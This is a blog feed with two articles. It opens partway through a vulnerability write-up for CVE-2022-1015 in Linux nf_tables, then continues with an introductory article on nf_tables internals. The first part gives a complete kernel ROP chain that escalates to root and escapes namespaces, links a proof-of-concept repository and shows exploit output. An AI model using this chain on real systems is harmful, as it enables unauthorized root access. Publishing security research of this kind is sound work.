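<p>Saving those registers ahead of time can be sketched as follows. This is an illustrative helper, not the code from the exploit: the struct and function names are made up, it only does real work on x86_64, and it relies on the GCC/Clang builtin <code class="language-plaintext highlighter-rouge">__builtin_ia32_readeflags_u64</code> to read RFLAGS.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdint.h&gt;

/* User-mode values that will later be placed in the IRET frame. */
struct user_state {
    uint64_t cs, ss, rsp, rflags;
};

/* Snapshot the segment selectors, stack pointer and flags of the caller.
 * On non-x86_64 targets the fields are simply left at zero. */
static struct user_state save_state(void)
{
    struct user_state s = {0};
#if defined(__x86_64__)
    __asm__ volatile("mov %%cs, %0" : "=r"(s.cs));
    __asm__ volatile("mov %%ss, %0" : "=r"(s.ss));
    __asm__ volatile("mov %%rsp, %0" : "=r"(s.rsp));
    s.rflags = __builtin_ia32_readeflags_u64();
#endif
    return s;
}
</code></pre></div></div>
<p>Calling it once before sending the payload is enough, since the saved values only need to describe a valid user-mode context to return into.</p>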

<p>Let’s take a look at the generated assembly of the <code class="language-plaintext highlighter-rouge">swapgs_restore_regs_and_return_to_usermode</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0xffffffff81e00ff0 &lt;+0&gt;:     pop    r15
0xffffffff81e00ff2 &lt;+2&gt;:     pop    r14
0xffffffff81e00ff4 &lt;+4&gt;:     pop    r13
0xffffffff81e00ff6 &lt;+6&gt;:     pop    r12
0xffffffff81e00ff8 &lt;+8&gt;:     pop    rbp
0xffffffff81e00ff9 &lt;+9&gt;:     pop    rbx
0xffffffff81e00ffa &lt;+10&gt;:    pop    r11
0xffffffff81e00ffc &lt;+12&gt;:    pop    r10
0xffffffff81e00ffe &lt;+14&gt;:    pop    r9
0xffffffff81e01000 &lt;+16&gt;:    pop    r8
0xffffffff81e01002 &lt;+18&gt;:    pop    rax
0xffffffff81e01003 &lt;+19&gt;:    pop    rcx
0xffffffff81e01004 &lt;+20&gt;:    pop    rdx
0xffffffff81e01005 &lt;+21&gt;:    pop    rsi
0xffffffff81e01006 &lt;+22&gt;:    mov    rdi,rsp
0xffffffff81e01009 &lt;+25&gt;:    mov    rsp,QWORD PTR gs:0x6004
0xffffffff81e01012 &lt;+34&gt;:    push   QWORD PTR [rdi+0x30]
0xffffffff81e01015 &lt;+37&gt;:    push   QWORD PTR [rdi+0x28]
0xffffffff81e01018 &lt;+40&gt;:    push   QWORD PTR [rdi+0x20]
0xffffffff81e0101b &lt;+43&gt;:    push   QWORD PTR [rdi+0x18]
0xffffffff81e0101e &lt;+46&gt;:    push   QWORD PTR [rdi+0x10]
0xffffffff81e01021 &lt;+49&gt;:    push   QWORD PTR [rdi]
...
0xffffffff81e01069 &lt;+121&gt;:   pop    rax
0xffffffff81e0106a &lt;+122&gt;:   pop    rdi
0xffffffff81e0106b &lt;+123&gt;:   swapgs
...
</code></pre></div></div>
<p>Looking at the generated assembly we see that a lot of registers are popped at the start. We wouldn’t want to pass that many dummy values in the ROP chain so we are going to actually enter the function at offset <code class="language-plaintext highlighter-rouge">&lt;+22&gt;</code> where the first <code class="language-plaintext highlighter-rouge">mov</code> instruction is. However, we will still have to pass two dummy values for the pop instructions at <code class="language-plaintext highlighter-rouge">&lt;+121&gt;</code> and <code class="language-plaintext highlighter-rouge">&lt;+122&gt;</code>.</p>

<p>The order of the registers that we pass to the IRET frame should be <code class="language-plaintext highlighter-rouge">RIP CS RFLAGS SP SS</code></p>

<p>So in total, this part of the ROP chain would take us:</p>
<ul>
  <li>1 word to pass the address of <code class="language-plaintext highlighter-rouge">swapgs_restore_regs_and_return_to_usermode+22</code></li>
  <li>2 dummy words for <code class="language-plaintext highlighter-rouge">rax</code> and <code class="language-plaintext highlighter-rouge">rdi</code></li>
  <li>5 words for the IRET frame.</li>
</ul>

<p>In total 8 words.</p>
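
<p>Those 8 words can be laid out with a small helper like the one below. It is only a sketch: the function name and parameters are hypothetical, and the caller is expected to pass the already-rebased address of <code class="language-plaintext highlighter-rouge">swapgs_restore_regs_and_return_to_usermode+22</code> together with the saved user-mode register values.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

/* Append the return-to-usermode stage to the chain at index n and
 * return the new word count (n + 8). */
static size_t append_return_stage(uint64_t *chain, size_t n,
                                  uint64_t trampoline_plus_22,
                                  uint64_t rip, uint64_t cs, uint64_t rflags,
                                  uint64_t sp, uint64_t ss)
{
    chain[n++] = trampoline_plus_22; /* enter the trampoline past the pops */
    chain[n++] = 0;                  /* dummy rax */
    chain[n++] = 0;                  /* dummy rdi */
    chain[n++] = rip;                /* IRET frame: RIP */
    chain[n++] = cs;                 /* IRET frame: CS */
    chain[n++] = rflags;             /* IRET frame: RFLAGS */
    chain[n++] = sp;                 /* IRET frame: SP */
    chain[n++] = ss;                 /* IRET frame: SS */
    return n;
}
</code></pre></div></div>
<p>Keeping the stage in one function makes it harder to get the IRET frame order wrong, which otherwise tends to show up as a fault right at the return to user space.</p>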

<h4 id="summarizing-the-rop-chain-">Summarizing the ROP chain <a name="summ"></a></h4>
<p>The total size of the ROP chain in my case is 23 words. The size will differ between builds due to gadget differences, etc.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="c1">// clearing interrupts</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">cli_ret</span><span class="p">;</span>

<span class="c1">// preparing credentials</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">pop_rdi_ret</span><span class="p">;</span> 
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// first argument of prepare_kernel_cred</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">prepare_kernel_cred</span><span class="p">;</span>

<span class="c1">// committing credentials</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">mov_rdi_rax_pop_rbx_ret</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// dummy rbx</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">commit_creds</span><span class="p">;</span>

<span class="c1">// switching namespaces</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">pop_rdi_ret</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">process_id</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">find_task_by_vpid</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">mov_rdi_rax_pop_rbx_ret</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// dummy rbx</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">pop_rsi_ret</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">init_nsproxy</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">switch_task_namespaces</span><span class="p">;</span>

<span class="c1">// returning to userland</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">kbase</span> <span class="o">+</span> <span class="n">swapgs_restore_regs_and_return_to_usermode</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// dummy rax</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// dummy rdi</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">spawnShell</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_cs</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_rflags</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_sp</span><span class="p">;</span>
<span class="n">payload</span><span class="p">[</span><span class="n">offset</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_ss</span><span class="p">;</span>
</code></pre></div></div>

<p>This is the complete ROP chain.</p>

<h2 id="proof-of-concept-">Proof-of-Concept <a name="poc"></a></h2>
<p>The PoC is available at <a href="https://github.com/ysanatomic/CVE-2022-1015">https://github.com/ysanatomic/CVE-2022-1015</a>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># ./exploit
[*] CVE-2022-1015 LPE Exploit by @YordanStoychev

uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
[*] Setting up user+network namespace sandbox

[+] STAGE 1: KASLR bypass 
[*] Socket is opened.
[*] Table leak_table created.
[*] Chain output_chain created.
[*] Bitwise expression is setup!
[*] Payload expression is setup!
[*] Verdict is setup!
[*] Address leak rule created!
[*] Packet sent... if no output in a second - it has failed
[*] Listening on port 50005
[&amp;] Leaked Address: 0xffffffff819bfc63
[&amp;] Kernel base address: 0xffffffff81000000

[+] STAGE 2: Escalation
[*] Socket is opened.
[*] Table rop_table created.
[*] Chain output_chain created.
[*] Copy ROP-to-Stack rules created.
[*] Saved userland registers
[#] cs: 0x33
[#] ss: 0x2b
[#] rsp: 0x7ffd969d1da0
[#] rflags: 0x246

[*] TCP Listener and client threads created!
[+] TCP server socket created.
[+] Bind to the port number: 50006
[*] Listening...
[*] Successfully sent 60 bytes SYN!
[*] Successfully received 48 bytes SYN-ACK!
[*] Sending an ACK packet with the payload...
[***] Exploit ran successfully
uid=0(root) gid=0(root)
#
</code></pre></div></div>

<h2 id="closing-remarks-">Closing Remarks <a name="closing"></a></h2>
<p>This vulnerability was extremely interesting to re-discover. The nf_tables codebase seems complicated at first but turns out to be remarkably simple once you know your way around.</p>

<p>The exploitation stage can be described as a big dose of educational fun even if frustrating at times - especially while hunting for a good hook where the stack is favourable to exploitation.</p>

<p>Massive thanks to <a href="https://twitter.com/pqlqpql">David Bouman</a>. His write-up was very educational - especially the overview of nf_tables that kick-started my research.</p>

<p>I hope this write-up was as much fun to read as it was for me to write.</p>

<p>Feel free to contact me on Twitter or via email if you have any questions.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[Incorrect validation in nf_tables allows for Out-of-Bounds Read and Write]]></summary></entry><entry><title type="html">Dissecting the Linux Firewall: Introduction to Netfilter’s nf_tables</title><link href="/netfilter_nf_tables/" rel="alternate" type="text/html" title="Dissecting the Linux Firewall: Introduction to Netfilter’s nf_tables" /><published>2022-11-01T12:00:00+00:00</published><updated>2022-11-01T12:00:00+00:00</updated><id>/nftables</id><content type="html" xml:base="/netfilter_nf_tables/"><![CDATA[<h2 id="introduction">Introduction</h2>
<p>Hello there!</p>

<p>This is an introduction to Netfilter’s nf_tables. While it isn’t a complete study of the internals, it can give you a solid base before you start your own research into the module. And if you have experience using tools like <strong>iptables</strong> and <strong>nft</strong> and want to see what happens behind the curtain, this article is for you as well.</p>

<p>While I have tried to make it as accessible as possible, the article assumes basic knowledge of <strong>C</strong> and the <strong>Linux Kernel</strong>.</p>

<h3 id="table-of-contents">Table of Contents</h3>
<ol>
  <li><a href="#whatis">What is Netfilter and nf_tables?</a></li>
  <li><a href="#parts">Building Blocks of the Firewall</a>
    <ul>
      <li><a href="#rules">Rules</a></li>
      <li><a href="#chains">Chains</a></li>
      <li><a href="#tables">Tables</a></li>
      <li><a href="#expressions">Expressions</a></li>
    </ul>
  </li>
  <li><a href="#registers">Registers</a>
    <ul>
      <li><a href="#dataregs">Data registers</a></li>
      <li><a href="#verdictreg">Verdict register and codes</a></li>
    </ul>
  </li>
  <li><a href="#quicklook">Taking a quick look at nft_do_chain</a></li>
  <li><a href="#expressions2">Expressions</a>
    <ul>
      <li><a href="#nft_immediate_expr">nft_immediate_expr</a></li>
      <li><a href="#nft_payload">nft_payload</a></li>
      <li><a href="#nft_payload_set">nft_payload_set</a></li>
      <li><a href="#nft_cmp_expr">nft_cmp_expr</a></li>
      <li><a href="#nft_bitwise">nft_bitwise</a></li>
      <li><a href="#nft_meta">nft_meta</a></li>
      <li><a href="#nft_byteorder">nft_byteorder</a></li>
      <li><a href="#nft_range_expr">nft_range_expr</a></li>
      <li><a href="#example">An example</a></li>
    </ul>
  </li>
  <li><a href="#hooks">Netfilter Hooks</a></li>
  <li><a href="#libraries">The Libraries - libnftnl and libmnl</a>
    <ul>
      <li><a href="#libmnl">libmnl</a></li>
      <li><a href="#libnftnl">libnftnl</a></li>
    </ul>
  </li>
  <li><a href="#closing">Closing remarks and acknowledgements</a></li>
</ol>

<h2 id="what-is-netfilter-and-nf_tables-">What is Netfilter and nf_tables? <a name="whatis"></a></h2>
<p>Netfilter is a framework in the Linux Kernel. It allows various network operations to be implemented in the form of <em>handlers</em> via <strong>hooks</strong>. It can be used for filtering, <em>Network Address Translation</em> or <em>port translation</em>.
In general, it can be summarized as a framework that allows you to <strong>direct, modify and control</strong> the flow of traffic in a network.</p>

<p>Many <strong>userspace programs</strong> use netfilter. The most common perhaps is <strong>iptables</strong>.</p>

<p>The subsystem we will be reviewing is nf_tables. It is responsible for filtering and rerouting packets. It is commonly used for building <em>firewalls</em>, as you can create complex rules that decide what happens to traffic - whether it is refused, redirected, modified or accepted.</p>

<p>You can also write your own <strong>userspace programs</strong> that use the nf_tables subsystem. For that purpose, a library has been developed that <strong>significantly</strong> simplifies the process - <em>libnftnl</em> (which requires the library <em>libmnl</em>). More on that later.</p>
<blockquote>
  <p>Note: libmnl and libnftnl also simplify the development of exploits targeting nf_tables :D</p>
</blockquote>

<h2 id="build-a-table-assemble-a-chain-form-rules-and-decide-on-expressions-">Build a table, assemble a chain, form rules and decide on expressions <a name="parts"></a></h2>
<p>When we talk about netfilter internals we will constantly mention <strong>expressions</strong> used in <strong>rules</strong> which form <strong>chains</strong> that are part of <strong>tables</strong>.
That might sound a little bit intimidating but don’t worry, we will go over everything.</p>

<h3 id="rules--">Rules  <a name="rules"></a></h3>
<p>Rules are exactly what their name suggests: the criteria by which packets are filtered, such as the protocol, the source, the destination or the port. Rules have a <strong>verdict</strong> - you can decide if you want to drop the packet, reject it or just accept it and go down the <strong>chain</strong> of rules.</p>

<blockquote>
  <p>Example: “udp dport 50001 drop” If the protocol is UDP <strong>and</strong> the destination port is 50001 it will drop the packet.</p>
</blockquote>

<p>In the future when we talk about a rule being “executed” we essentially mean that the packet going through is being evaluated against the rule to determine if the packet fits the rule or not.</p>

<h3 id="chains--">Chains  <a name="chains"></a></h3>
<p>Chains are essentially linear structures of rules. After one rule is checked, execution moves on to the next one. Sometimes the verdict might make the execution jump to another chain. However, we always have a <em>base chain</em>.
A base chain is where execution begins. For example, if there is a rule that checks whether the protocol is <code class="language-plaintext highlighter-rouge">UDP</code>, you can make the execution jump to another chain that only has rules for <code class="language-plaintext highlighter-rouge">UDP</code> packets.</p>

<p>Execution always begins from a base chain because they are the chains attached to a <strong>netfilter hook</strong>. We will talk extensively about hooks later but they essentially show when a chain should be executed. If an input hook is being used then the chain will be executed against incoming packets - if an output hook - against outgoing packets.</p>

<h3 id="tables--">Tables  <a name="tables"></a></h3>
<p>Tables are the top-level structures. They contain the chains. A chain can only jump to another chain in the same table.</p>

<p>Tables belong to a particular family. The family defines what type of packets will be handled by the chains in the table.
The families are - <code class="language-plaintext highlighter-rouge">ip</code>, <code class="language-plaintext highlighter-rouge">ip6</code>, <code class="language-plaintext highlighter-rouge">inet</code>, <code class="language-plaintext highlighter-rouge">arp</code>, <code class="language-plaintext highlighter-rouge">bridge</code>, <code class="language-plaintext highlighter-rouge">netdev</code>.</p>

<p>Tables belonging to the families <code class="language-plaintext highlighter-rouge">ip</code> and <code class="language-plaintext highlighter-rouge">ip6</code> see only IPv4 and IPv6 packets respectively. The <code class="language-plaintext highlighter-rouge">inet</code> family allows a table to see both IPv4 and IPv6 packets.</p>

<p>The <code class="language-plaintext highlighter-rouge">arp</code> family allows tables to see ARP-level traffic while tables belonging to the <code class="language-plaintext highlighter-rouge">bridge</code> family only see packets traversing bridges.</p>

<p>The <code class="language-plaintext highlighter-rouge">netdev</code> family allows base chains to be attached to a particular network interface. Such base chains will then see <strong>all</strong> network traffic on that interface. That means that ARP traffic can be handled from here as well. The <code class="language-plaintext highlighter-rouge">netdev</code> family is only used when the base chains of the table will use the <code class="language-plaintext highlighter-rouge">ingress</code> hook but more on that later.</p>

<h3 id="expressions--">Expressions  <a name="expressions"></a></h3>
<p>Expressions are small operations to which you pass arguments. They perform actions on packets. Expressions, executed (or rather evaluated) one after another, form a rule.
An example of an expression is the payload expression <code class="language-plaintext highlighter-rouge">nft_payload_expr</code>. It copies data from the packet’s headers and saves it into the <code class="language-plaintext highlighter-rouge">registers</code>.
The registers are like a local data storage that you can write to and read from with expressions. They can be used to pass data between expressions.</p>

<p>So in conclusion: Expressions are operators we can use by providing them with arguments. Multiple expressions that will be evaluated one after the other form a rule. Multiple rules <em>chained</em> together form a chain.</p>
<blockquote>
  <p>Ex: If we have the rule udp dport 50001 drop,
we first check with an expression whether the protocol is udp,
then we check with another expression whether the destination port is 50001,
and if both are true we use a third expression to <em>drop</em> the packet by setting a verdict.</p>
</blockquote>
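<p>The example above can be sketched in plain C. This is a minimal userspace model and not kernel code: every name prefixed with <code class="language-plaintext highlighter-rouge">sk_</code> is hypothetical, the port is kept in host byte order, and the real payload, compare and immediate expressions carry far more state. It only illustrates how expressions share registers and how a failed comparison stops the rest of the rule.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-ins for the verdict codes; the values are arbitrary. */
enum sk_verdict { SK_CONTINUE, SK_BREAK, SK_DROP };

/* A drastically simplified packet: only the fields this rule needs. */
struct sk_packet {
	uint8_t  l4proto; /* 17 is UDP */
	uint16_t dport;   /* host byte order, to keep the sketch short */
};

#define SK_NUM_DATA_REGS 16

struct sk_regs {
	enum sk_verdict verdict;
	uint32_t data[SK_NUM_DATA_REGS];
};

enum sk_expr_kind { SK_LOAD_PROTO, SK_LOAD_DPORT, SK_CMP_EQ, SK_SET_VERDICT };

struct sk_expr {
	enum sk_expr_kind kind;
	unsigned int reg; /* data register the expression reads or writes */
	uint32_t value;   /* value to compare against, or verdict to set */
};

/* Evaluate one expression against the packet and the shared registers. */
static void sk_eval_expr(const struct sk_expr *e, struct sk_regs *regs,
			 const struct sk_packet *pkt)
{
	assert(e->reg < SK_NUM_DATA_REGS); /* never index outside the registers */

	switch (e->kind) {
	case SK_LOAD_PROTO:
		regs->data[e->reg] = pkt->l4proto;
		break;
	case SK_LOAD_DPORT:
		regs->data[e->reg] = pkt->dport;
		break;
	case SK_CMP_EQ:
		/* A mismatch ends the rule without deciding the packet's fate. */
		if (regs->data[e->reg] != e->value)
			regs->verdict = SK_BREAK;
		break;
	case SK_SET_VERDICT:
		regs->verdict = (enum sk_verdict)e->value;
		break;
	}
}

/* "udp dport 50001 drop" expressed as a sequence of expressions. */
static const struct sk_expr sk_rule[] = {
	{ SK_LOAD_PROTO,  0, 0 },
	{ SK_CMP_EQ,      0, 17 },
	{ SK_LOAD_DPORT,  0, 0 },
	{ SK_CMP_EQ,      0, 50001 },
	{ SK_SET_VERDICT, 0, SK_DROP },
};

/* Run the rule; evaluation stops once the verdict is no longer "continue". */
static enum sk_verdict sk_eval_rule(uint8_t l4proto, uint16_t dport)
{
	struct sk_packet pkt = { l4proto, dport };
	struct sk_regs regs = { .verdict = SK_CONTINUE };
	size_t n = sizeof(sk_rule) / sizeof(sk_rule[0]);

	for (size_t i = 0; i < n && regs.verdict == SK_CONTINUE; i++)
		sk_eval_expr(&sk_rule[i], &regs, &pkt);
	return regs.verdict;
}
```

<p>In this sketch, calling <code class="language-plaintext highlighter-rouge">sk_eval_rule(17, 50001)</code> reaches the last expression and yields the drop verdict, while a TCP packet or a different port stops at the first failing comparison and leaves the decision to the following rules.</p>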

<h2 id="registers-">Registers <a name="registers"></a></h2>
<p>We will now take a look at a very essential part - The Registers.
Registers store data. That data can be accessed or modified by expressions by targeting a specific <em>register</em>.
Although registers can be viewed as separate it is most of the time useful to see them as one continuous buffer of data where the <em>register index</em> is just an offset of the buffer.</p>

<p>But how much data can we store in the registers? That part might be a little bit confusing.</p>

<p>Originally there were five <em>16 byte</em> registers. One <strong>verdict</strong> register and four data registers - each is 16 bytes. In total 80 bytes.</p>
<blockquote>
  <p>Verdict (16) + 4 * data (16) = 80</p>
</blockquote>

<p>But now things are a little different - there is still one 16 byte register, <strong>the verdict register</strong>, but the data registers can now also be addressed as <strong>sixteen</strong> registers of 4 bytes each.</p>
<blockquote>
  <p>Verdict(16) + 16 * data (4) = 80</p>
</blockquote>

<h3 id="data-registers-">Data registers <a name="dataregs"></a></h3>
<p>So the data registers used to be four - each 16 bytes. Now they are sixteen - each 4 bytes.</p>

<p>We can view the registers as one continuous buffer of data where the <em>registers</em> are just offsets in that buffer.
Well that would mean we just have two types of offsets. The first type is every 16 bytes. The second type is every 4 bytes.</p>

<p>Let’s take a look at the register’s enum type - it defines the offsets.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">enum</span> <span class="n">nft_registers</span> <span class="p">{</span>
	<span class="n">NFT_REG_VERDICT</span><span class="p">,</span>
	<span class="n">NFT_REG_1</span><span class="p">,</span>
	<span class="n">NFT_REG_2</span><span class="p">,</span>
	<span class="n">NFT_REG_3</span><span class="p">,</span>
	<span class="n">NFT_REG_4</span><span class="p">,</span>
	<span class="n">__NFT_REG_MAX</span><span class="p">,</span>

	<span class="n">NFT_REG32_00</span>	<span class="o">=</span> <span class="mi">8</span><span class="p">,</span>
	<span class="n">NFT_REG32_01</span><span class="p">,</span>
	<span class="n">NFT_REG32_02</span><span class="p">,</span>
	<span class="p">...</span>
	<span class="n">NFT_REG32_13</span><span class="p">,</span>
	<span class="n">NFT_REG32_14</span><span class="p">,</span>
	<span class="n">NFT_REG32_15</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">NFT_REG_1</code> to <code class="language-plaintext highlighter-rouge">NFT_REG_4</code> are the 16 byte offsets while <code class="language-plaintext highlighter-rouge">NFT_REG32_00</code> to <code class="language-plaintext highlighter-rouge">NFT_REG32_15</code> are the <em>4 byte ones</em>.</p>

<p><img src="https://i.imgur.com/93aKEAi.png" alt="regs_schematic.png" /></p>
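<p>Both addressing schemes can be reduced to a byte offset into the same 80 byte buffer. The following is a sketch under the layout described above, not the kernel’s own parsing code: the <code class="language-plaintext highlighter-rouge">SK_</code> constants mirror the enum values shown earlier and the helper names are made up for illustration.</p>

```c
#include <assert.h>

/* Values taken from the enum above; names are hypothetical. */
#define SK_REG_VERDICT 0u
#define SK_REG_1       1u
#define SK_REG_4       4u
#define SK_REG32_00    8u
#define SK_REG32_15    23u

#define SK_REG_SIZE    16u /* size of a 16 byte register */
#define SK_REG32_SIZE  4u  /* size of a 4 byte register */

/* A register index is valid if it falls in one of the two enum ranges. */
static int sk_reg_is_valid(unsigned int reg)
{
	return reg <= SK_REG_4 ||
	       (reg >= SK_REG32_00 && reg <= SK_REG32_15);
}

/* Translate a register index into a byte offset in the register buffer. */
static unsigned int sk_reg_byte_offset(unsigned int reg)
{
	assert(sk_reg_is_valid(reg));

	if (reg <= SK_REG_4)
		return reg * SK_REG_SIZE;

	/* The 4 byte registers start right after the verdict register. */
	return SK_REG_SIZE + (reg - SK_REG32_00) * SK_REG32_SIZE;
}
```

<p>With this mapping <code class="language-plaintext highlighter-rouge">NFT_REG_1</code> and <code class="language-plaintext highlighter-rouge">NFT_REG32_00</code> both land on byte 16, and <code class="language-plaintext highlighter-rouge">NFT_REG_2</code> lands on the same byte as <code class="language-plaintext highlighter-rouge">NFT_REG32_04</code>, which is the overlap the schematic shows. Indexes outside both ranges have to be rejected before they are ever used as an offset.</p>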

<p>We have mentioned the <em>verdict register</em> multiple times, so let’s talk about it.</p>

<h3 id="verdict-register-">Verdict register <a name="verdictreg"></a></h3>
<p>The verdict register sits at <strong>offset</strong> zero in the registers. The size of the verdict register is 16 bytes. During each rule a verdict can be set for the packet. The verdict can be set to the following values:</p>
<ol>
  <li><code class="language-plaintext highlighter-rouge">NFT_CONTINUE</code> - reached after the chain is executed fully. Allows the packet through the firewall. The default verdict. If the verdict is set to anything but this -&gt; no more expressions will be executed in the rule. Depending on the verdict that might mean that we just continue down the other rules, go to another chain or completely drop the packet.</li>
  <li><code class="language-plaintext highlighter-rouge">NFT_BREAK</code> - the rest of the expressions in the rule are <em>skipped</em>, but execution then continues with the next rules in the chain as normal.</li>
  <li><code class="language-plaintext highlighter-rouge">NF_DROP</code> - drop the packet - no more expressions will be performed.</li>
  <li><code class="language-plaintext highlighter-rouge">NF_ACCEPT</code> - accepts the packet preemptively.</li>
  <li><code class="language-plaintext highlighter-rouge">NFT_GOTO</code> - go to another chain and go through the rules there. It does not return to the current chain.</li>
  <li><code class="language-plaintext highlighter-rouge">NFT_JUMP</code> - jump to another chain and, after going through the rules there, if the verdict is still <code class="language-plaintext highlighter-rouge">NFT_CONTINUE</code>, return to the original chain and continue with the rules in it.
    <blockquote>
      <p>Verdicts like NF_DROP and NF_ACCEPT (and the unmentioned NF_STOLEN and NF_QUEUE) just return that code to the caller, which then decides what to do with the packet.</p>
    </blockquote>
  </li>
</ol>

<p>When the verdict is set to <em>jump</em>, execution moves to another chain in the table and the rules in that chain are checked against the packet going through the firewall.
So the verdict register controls the <em>fate</em> of our packet - which chains it goes through and, finally, whether it is allowed or not. In other words, the verdict controls the execution flow.</p>
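<p>The difference between jump and goto is easiest to see in a toy model. The sketch below is an assumption-laden simplification: each rule unconditionally produces one verdict, all <code class="language-plaintext highlighter-rouge">sk_</code> names are hypothetical, and the stack depth of 16 is just a value picked for the model. It is not the kernel’s implementation, only the control flow described in the list above.</p>

```c
#include <assert.h>
#include <stddef.h>

enum sk_code { SK_CONTINUE, SK_DROP, SK_ACCEPT, SK_JUMP, SK_GOTO };

struct sk_chain;

/* In this toy model every rule simply yields one fixed verdict. */
struct sk_rule {
	enum sk_code code;
	const struct sk_chain *target; /* only used by SK_JUMP and SK_GOTO */
};

struct sk_chain {
	const struct sk_rule *rules;
	size_t nrules;
};

#define SK_JUMP_STACK_SIZE 16

struct sk_frame {
	const struct sk_chain *chain; /* chain to return to */
	size_t next;                  /* index of the rule to resume at */
};

static enum sk_code sk_do_chain(const struct sk_chain *chain)
{
	struct sk_frame stack[SK_JUMP_STACK_SIZE];
	size_t sp = 0, i = 0;

	for (;;) {
		while (i < chain->nrules) {
			const struct sk_rule *r = &chain->rules[i++];

			switch (r->code) {
			case SK_CONTINUE:
				break;
			case SK_DROP:
			case SK_ACCEPT:
				return r->code; /* final decision */
			case SK_JUMP:
			case SK_GOTO:
				assert(r->target != NULL);
				if (r->code == SK_JUMP) {
					/* Remember where to come back to. */
					if (sp == SK_JUMP_STACK_SIZE)
						return SK_DROP;
					stack[sp].chain = chain;
					stack[sp].next = i;
					sp++;
				}
				chain = r->target;
				i = 0;
				break;
			}
		}
		if (sp == 0)
			return SK_CONTINUE; /* ran off the end with nothing to return to */
		sp--;
		chain = stack[sp].chain;
		i = stack[sp].next;
	}
}

/* Base chain: [ <how> to udp_chain, drop ]; udp_chain: [ continue ]. */
static enum sk_code sk_demo(enum sk_code how)
{
	static const struct sk_rule udp_rules[] = { { SK_CONTINUE, NULL } };
	static const struct sk_chain udp_chain = { udp_rules, 1 };
	const struct sk_rule base_rules[] = {
		{ how, &udp_chain },
		{ SK_DROP, NULL },
	};
	const struct sk_chain base = { base_rules, 2 };

	return sk_do_chain(&base);
}
```

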